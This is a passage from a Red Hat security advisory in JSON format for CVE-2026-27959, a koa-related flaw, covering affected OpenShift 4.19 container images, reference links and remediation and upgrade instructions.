"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27959"
},
{
"category": "external",
"summary": "RHBZ#2442928",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2442928"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27959",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27959"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27959"
},
{
"category": "external",
"summary": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df",
"url": "https://github.com/koajs/koa/commit/55ab9bab044ead4e82c70a30a4f9dc0fc9c1b6df"
},
{
"category": "external",
"summary": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb",
"url": "https://github.com/koajs/koa/commit/b76ddc01fdb703e51652b0fd131d16394cadcfeb"
},
{
"category": "external",
"summary": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm",
"url": "https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"
}
],
"release_date": "2026-02-26T01:45:45.668000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-16T10:18:08+00:00",
"details": "For OpenShift Container Platform 4.19 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html/release_notes/\n\nYou may download the oc tool and use it to inspect release image metadata for x86_64, s390x, ppc64le, and aarch64 architectures. The image digests may be found at https://quay.io/repository/openshift-release-dev/ocp-release?tab=tags.\n\nThe sha values for the release are as follows:\n\n (For x86_64 architecture)\n The image digest is sha256:b274766f7194a7dc825e335a54078790519c0dbe3431c029fd08dbba1c431855\n\n (For s390x architecture)\n The image digest is sha256:066bfcb590ef6f34106e63861d420a3fdcdebd734bb729668c8c6de59b84c632\n\n (For ppc64le architecture)\n The image digest is sha256:ff14e60b2b4760a6c2578e444b40f457fe2322f5211b1b838078b1fa6ea1b443\n\n (For aarch64 architecture)\n The image digest is sha256:52b1e8cf83dd1a854194212cc94bfe2719afb2e014f7b1a315250a9c7273a600\n\nAll OpenShift Container Platform 4.19 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.redhat.com/en/documentation/openshift_container_platform/4.19/html-single/updating_clusters/index#updating-cluster-cli.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:c2c1f73f4ec1f7b91ebfc39a4282dddae2978a79150523a9c72748f50f7a2d89_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7249"
},
{
"category": "workaround",
"details": "Red Hat is not aware of a practical temporary workaround that fully mitigates this issue or meets Red Hat Product Security\u0027s standards for usability, deployment, applicability, or stability. Customers are advised to apply the relevant security updates once they become available.",
"product_ids": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
